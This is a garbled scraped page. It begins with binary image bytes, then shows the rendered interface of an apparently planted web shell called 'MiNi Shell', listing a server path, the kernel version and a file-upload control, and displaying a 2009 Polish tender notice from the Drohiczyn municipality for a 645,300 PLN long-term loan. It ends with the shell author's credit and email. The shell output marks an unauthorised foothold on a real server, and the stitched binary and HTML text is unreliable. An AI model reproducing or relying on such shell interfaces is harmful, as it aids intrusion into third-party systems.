JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090528/170562-N-2009.html

<p class="kh_header"><b>Drohiczyn: Udzielenie  i obsługa kredytu długoterminowego w wysokości 645300,00 PLN (sześćset czterdzieści pięć tysięcy trzysta złotych) przeznaczonego na spłatę w 2009r. rat wcześniej zaciągniętych pożyczek i kredytu.</b><br>
<b>Numer ogłoszenia: 170562 - 2009; data zamieszczenia: 28.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Drohiczyn , ul. Kraszewskiego 5, 17-312 Drohiczyn, woj. podlaskie, tel. 085 6557135, faks 085 655 70 80.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.drohiczyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie  i obsługa kredytu długoterminowego w wysokości 645300,00 PLN (sześćset czterdzieści pięć tysięcy trzysta złotych) przeznaczonego na spłatę w 2009r. rat wcześniej zaciągniętych pożyczek i kredytu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia:
Kredyt długoterminowy w kwocie 645300,00 PLN (sześćset czterdzieści pięć tysięcy trzysta złotych) przeznaczonego na spłatę w 2009r. rat wcześniej zaciągniętych pożyczek i kredytu dostępny w 2009 r. 
a)	Okres kredytowania: od uruchomienia kredytu do 31.12. 2016 r.
b)	Spłata rat kapitałowych :
w 2010r: do  30.09 - 2500,00zł, do 20.12 - 2.500,00zł
w 2011r: do  30.09 - 2.500,00zł, do 20.12 - 2.500,00zł
w 2012r: do 30.09 - 5.000,00zł, do 20.12 - 5.000,00zł
w 2013r:  do 30.09 -65.000,00zł, do 20.12 - 65.000,00zł 
w 2014r:  do 30.09 - 65.000,00zł, do 20.12 -65.000,00zł 
w 2015r:  do 30.09 - 62.000,00zł, do 20.12 -63.300,00zł 
w 2016r:  do 30.09 - 120.000,00zł, do 20.12 - 120.000,00zł 
c)	Odsetki naliczane w ratach miesięcznych, liczone od faktycznie wykorzystanych środków. 
d)	Oprocentowanie kredytu w stosunku do stopy procentowej WIBOR 1M jest ustalane na dwa dni robocze przed rozpoczęciem kolejnego miesięcznego okresu odsetkowego. 
e)	Zamawiający zastrzega możliwość wcześniejszej spłaty kredytu (bez konsekwencji finansowych, po uprzednim zawiadomieniu banku).
f)	Spłata odsetek następować będzie, na koniec każdego  miesiąca od momentu uruchomienia kredytu.
g)	Oferent jest obowiązany do skalkulowania i podania w ofercie wyłącznie jednej  stawki, składającej się z:
-	stopy procentowej WIBOR 1M ogłoszonej w dzienniku Rzeczpospolita  w dniu  5 czerwca 2009r.,
-	marży banku w skład której wchodzą wszelkie opłaty,  prowizje i inne korzyści bankowe

h)	W umowie kredytowej za obowiązujące uznaje się oprocentowanie kredytu wyliczone wg zmiennej stawki WIBOR 1M oraz stałej marży banku.
i)	Forma zabezpieczenia kredytu - weksel in blanco wraz z deklaracją wekslową.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.13.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2016.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 8.000zł (słownie: osiem tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Uprawnienie do występowania w obrocie prawnym.
Brak zaległości w opłacaniu podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne.
Niekaralność na podst. art. 24 ust 1 pkt 1,4 i 8 Ustawy prawo zamówień publicznych z pózn. zmianami..
Przyjęcie bez zastrzeżeń warunków niniejszej specyfikacji.
Wniesienie wadium.
Spełnianie warunków art. 22 ust. 1 oraz nie podleganie wykluczeniu na podst. art. 24 ust. 1 i 2 Ustawy prawo zamówień publicznych(Dz. U. z 2007r. Nr 223, poz. 1655)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Aktualny wypis /odpis/ zaświadczenie z właściwego rejestru o wpisie do ewidencji działalności gospodarczej, wystawiony bądź potwierdzony nie wcześniej niż na sześć miesięcy przed terminem składania ofert.
Aktualne (tj. wystawiony nie wcześniej niż na 3 miesiące przed terminem składania ofert.)  zaświadczenia z właściwego urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzających, że oferent nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społecznelubzaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego
Aktualna informacja z Centralnego Rejestru Skazanych (wydany nie wcześniej niż sześć miesięcy przed terminem składania ofert) osób reprezentujących bank (Zarząd Banku) do złożenia oferty  i podpisania umowy
Oświadczenie, że oferent zapoznał się z SIWZ i akceptuje bez zastrzeżeń jej treść.
Oryginał lub kopia potwierdzona za zgodność z oryginałem potwierdzająca wniesienie wadium oraz informację o rachunku bankowym, na który należy dokonać zwrotu wadium wniesionego w formie pieniężnej.
Oświadczenie oferenta (Załącznik Nr 2 do SIWZ)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.drohiczyn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Drohiczynie, ul. Kraszewskiego 5, 17-312 Drohiczyn pok. nr 9.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2009 godzina 12:00, miejsce: Urząd Miejski w Drohiczynie, ul. Kraszewskiego 5, 17-312 Drohiczyn pok. nr 12 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com